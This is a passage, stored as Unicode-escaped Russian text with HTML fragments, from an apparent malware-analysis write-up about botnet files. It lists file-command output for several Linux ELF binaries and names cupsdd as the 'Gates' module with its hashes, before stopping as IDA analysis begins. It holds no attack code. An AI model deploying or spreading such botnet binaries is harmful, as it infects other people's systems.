\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u0444\u0430\u0439\u043b\u043e\u0432 \u0431\u043e\u0442\u043d\u0435\u0442\u0430<\/h4>\n
  \u041f\u0435\u0440\u0432\u044b\u043c \u0434\u0435\u043b\u043e\u043c, \u044f \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043e\u0439 file<\/b>, \u0447\u0442\u043e\u0431\u044b \u0443\u0437\u043d\u0430\u0442\u044c \u043f\u043e\u0431\u043e\u043b\u044c\u0448\u0435 \u043e\u0431 \u044d\u0442\u0438\u043c \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0445 \u0444\u0430\u0439\u043b\u0430\u0445:  <\/p>\n
atddd:    ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU\/Linux 2.2.5, not stripped cupsdd:   ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU\/Linux 2.2.5, not stripped cupsddh:  ELF 32-bit LSB executable, Intel 80386, version 1 (GNU\/Linux), statically linked, stripped ksapdd:   ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU\/Linux 2.2.5, not stripped kysapdd:  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU\/Linux 2.2.5, not stripped skysapdd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU\/Linux 2.2.5, not stripped xfsdxd:   ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU\/Linux 2.2.5, not stripped<\/code><\/pre>\n
  Not stripped! \u0412\u043e\u0442 \u0442\u0430\u043a \u043d\u043e\u0432\u043e\u0441\u0442\u044c!
  \u041c\u043d\u0435 \u043f\u043e\u0447\u0435\u043c\u0443-\u0442\u043e \u043f\u043e\u043d\u0440\u0430\u0432\u0438\u043b\u0441\u044f \u0444\u0430\u0439\u043b cupsdd, \u0438 \u044f \u043f\u0435\u0440\u0432\u044b\u043c \u0434\u0435\u043b\u043e\u043c \u0437\u0430\u0433\u0440\u0443\u0437\u0438\u043b \u0435\u0433\u043e, \u0430 \u043d\u0435 atddd. \u0421\u0430\u043c \u043d\u0435 \u0437\u043d\u0430\u044e \u043f\u043e\u0447\u0435\u043c\u0443, \u043d\u043e \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u043d\u043e \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e.  <\/p>\n
Gates<\/h5>\n
  \u0418\u0442\u0430\u043a, cupsdd<\/b> \u2014 \u043c\u043e\u0434\u0443\u043b\u044c \u00abGates\u00bb. md5 603170ad361f6e098c8681ed264155eb<\/b>, sha1 1714fd31cc931e2a0eb97d25a076567af45dc6d8<\/b>
  \u0427\u0442\u043e \u0436\u0435 \u043e\u043d \u0434\u0435\u043b\u0430\u0435\u0442, \u0438 \u043f\u043e\u0447\u0435\u043c\u0443 \u043e\u043d \u00abGates\u00bb? \u041d\u0443, \u043d\u0430 \u044d\u0442\u043e \u043d\u0430\u043c \u043e\u0442\u0432\u0435\u0442\u0438\u0442 IDA Pro, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440.
  \"image\"\/<\/p>\n
  \"image\"\/<\/p>\n
  \u0427\u0442\u043e \u0436\u0435 \u0434\u0435\u043b\u0430\u0435\u0442 \u044d\u0442\u043e\u0442 \u043c\u043e\u0434\u0443\u043b\u044c?<\/p>\n